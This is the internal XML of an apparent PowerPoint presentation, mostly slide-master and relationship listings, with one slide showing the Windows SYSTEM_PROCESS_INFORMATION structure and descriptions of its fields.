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 id="2147483743" r:id="rId49"/>
    <p:sldMasterId id="2147483745" r:id="rId50"/>
    <p:sldMasterId id="2147483747" r:id="rId51"/>
    <p:sldMasterId id="2147483749" r:id="rId52"/>
    <p:sldMasterId id="2147483751" r:id="rId53"/>
    <p:sldMasterId id="2147483753" r:id="rId54"/>
    <p:sldMasterId id="2147483755" r:id="rId55"/>
    <p:sldMasterId id="2147483757" r:id="rId56"/>
    <p:sldMasterId id="2147483759" r:id="rId57"/>
    <p:sldMasterId id="2147483761" r:id="rId58"/>
    <p:sldMasterId id="2147483763" r:id="rId59"/>
    <p:sldMasterId id="2147483765" r:id="rId60"/>
    <p:sldMasterId id="2147483767" r:id="rId61"/>
    <p:sldMasterId id="2147483769" r:id="rId62"/>
    <p:sldMasterId id="2147483771" r:id="rId63"/>
    <p:sldMasterId id="2147483773" r:id="rId64"/>
    <p:sldMasterId id="2147483775" r:id="rId65"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId68"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="257" r:id="rId66"/>
    <p:sldId id="263" r:id="rId67"/>
    <p:sldId id="665" r:id="rId69"/>
    <p:sldId id="642" r:id="rId70"/>
    <p:sldId id="643" r:id="rId71"/>
    <p:sldId id="644" r:id="rId72"/>
    <p:sldId id="729" r:id="rId73"/>
    <p:sldId id="767" r:id="rId74"/>
    <p:sldId id="768" r:id="rId75"/>
    <p:sldId id="769" r:id="rId76"/>
    <p:sldId id="770" r:id="rId77"/>
    <p:sldId id="771" r:id="rId78"/>
    <p:sldId id="772" r:id="rId79"/>
    <p:sldId id="773" r:id="rId80"/>
    <p:sldId id="774" r:id="rId81"/>
    <p:sldId id="775" r:id="rId82"/>
    <p:sldId id="776" r:id="rId83"/>
    <p:sldId id="777" r:id="rId84"/>
    <p:sldId id="779" r:id="rId85"/>
    <p:sldId id="780" r:id="rId86"/>
    <p:sldId id="781" r:id="rId87"/>
    <p:sldId id="782" r:id="rId88"/>
    <p:sldId id="783" r:id="rId89"/>
    <p:sldId id="784" r:id="rId90"/>
    <p:sldId id="785" r:id="rId91"/>
    <p:sldId id="786" r:id="rId92"/>
    <p:sldId id="787" r:id="rId93"/>
    <p:sldId id="788" r:id="rId94"/>
    <p:sldId id="789" r:id="rId95"/>
    <p:sldId id="666" r:id="rId96"/>
    <p:sldId id="691" r:id="rId97"/>
    <p:sldId id="690" r:id="rId98"/>
    <p:sldId id="692" r:id="rId99"/>
    <p:sldId id="637" r:id="rId100"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
      <p:regular r:id="rId104"/>
    </p:embeddedFont>
  </p:embeddedFontLst>
  <p:custDataLst>
    <p:tags r:id="rId10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7AF"/>
    <a:srgbClr val="D1202F"/>
    <a:srgbClr val="0000FF"/>
    <a:srgbClr val="FADBD8"/>
    <a:srgbClr val="37BECC"/>
    <a:srgbClr val="D7F2F5"/>
    <a:srgbClr val="E74C3C"/>
    <a:srgbClr val="CA3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3879"/>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33.xml"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide32.xml"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide31.xml"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide30.xml"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide29.xml"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide28.xml"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide27.xml"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide26.xml"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide25.xml"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide24.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster8.xml"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide23.xml"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide22.xml"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide21.xml"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide20.xml"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide19.xml"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide18.xml"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide17.xml"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide16.xml"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide15.xml"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide14.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster7.xml"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide13.xml"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide12.xml"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide11.xml"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide10.xml"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide9.xml"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide8.xml"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide7.xml"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide6.xml"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide5.xml"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide4.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster6.xml"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide3.xml"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="notesMasters/notesMaster1.xml"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide2.xml"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide1.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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="tags/tag477.xml"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font1.fntdata"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tableStyles" Target="tableStyles.xml"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/viewProps" Target="viewProps.xml"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/presProps" Target="presProps.xml"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide3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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag23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Layout" Target="../slideLayouts/slideLayout49.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster49.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme49.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag24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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme50.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag24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Layout" Target="../slideLayouts/slideLayout51.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster51.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme51.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag25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Layout" Target="../slideLayouts/slideLayout52.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster52.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme52.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag2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Layout" Target="../slideLayouts/slideLayout53.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster53.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme53.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag25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Layout" Target="../slideLayouts/slideLayout54.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster54.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme54.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag26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Layout" Target="../slideLayouts/slideLayout55.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster55.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme55.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag26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slideLayout" Target="../slideLayouts/slideLayout56.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster56.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme56.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag27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Layout" Target="../slideLayouts/slideLayout57.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster57.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme57.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag27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Layout" Target="../slideLayouts/slideLayout58.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster58.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme58.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag27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Layout" Target="../slideLayouts/slideLayout59.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster59.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme59.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag28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60.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme60.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag28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Layout" Target="../slideLayouts/slideLayout61.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster61.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme61.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag29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slideLayout" Target="../slideLayouts/slideLayout62.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster62.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme62.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag29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Layout" Target="../slideLayouts/slideLayout63.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster63.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme63.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag29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slideLayout" Target="../slideLayouts/slideLayout64.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster64.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme64.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag30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5.png"/><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image" Target="../media/image4.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag30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6.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><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7.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><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8.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><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50.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag377.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.pn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51.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><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2.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag384.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag38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3.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4.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2.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17.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag308.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56.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><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57.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><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58.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><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59.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><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60.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><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61.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><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62.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag430.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag429.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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag433.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag432.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag431.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64.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag436.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag435.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag434.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65.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tags" Target="../tags/tag439.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag438.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag437.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide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slideLayout" Target="../slideLayouts/slideLayout1.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9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag447.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag446.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag445.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag444.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag443.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag442.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag441.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag440.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag449.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag448.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9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag458.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag457.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag456.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag455.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag454.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag453.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag452.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag451.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide27.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag460.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag459.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag450.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63.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag462.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag461.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465.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag464.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide34.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag473.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag472.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag471.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag470.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag469.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag468.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag467.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag466.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide30.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag476.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag475.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag474.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slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag338.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.svg"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag337.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag32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image" Target="../media/image9.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag340.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag33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image" Target="../media/image8.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag348.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag34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4.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag350.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag34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5.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag352.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag35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22250" y="1083945"/>
            <a:ext cx="4687570" cy="528510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1500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>typedef struct _SYSTEM_PROCESS_INFORMATION {</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NextEntryOffset;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NumberOfThreads;</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BYTE Reserved1[48];</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UNICODE_STRING ImageName;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KPRIORITY BasePriority;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HANDLE UniqueProcessId;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Reserved2;</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HandleCount;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SessionId;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Reserved3;</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Reserved4;</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Reserved5;</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QuotaNonPagedPoolUsage;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PrivatePageCount;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LARGE_INTEGER Reserved7[6];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SYSTEM_PROCESS_INFORMATION;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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4907280" y="3140075"/>
            <a:ext cx="7096760" cy="32461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NextEntryOffset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start of the next item in the array is the address of the previous item plus  the value in the NextEntryOffset member. For the last item in the array, NextEntryOffset is 0.</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ImageName</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process's image name.</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BasePriority</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BasePriority member contains the base priority of the process, which is the starting priority for threads created within the associated process.</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PeakVirtualSize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peak size, in bytes, of the virtual memory used by the process.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="组合 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5150485" y="1083945"/>
            <a:ext cx="6891020" cy="2001520"/>
            <a:chOff x="8111" y="1707"/>
            <a:chExt cx="10852" cy="3152"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="圆角矩形 2"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8171" y="1707"/>
              <a:ext cx="10733" cy="3153"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 8909"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="CA3E9D">
                <a:alpha val="5000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="CA3E9D"/>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111" y="1879"/>
              <a:ext cx="10852" cy="2809"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr marL="360045" indent="-179705" algn="l" fontAlgn="auto">
                <a:buSzPct val="150000"/>
                <a:buBlip>
                  <a:blip r:embed="rId6"/>
                </a:buBlip>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2200">
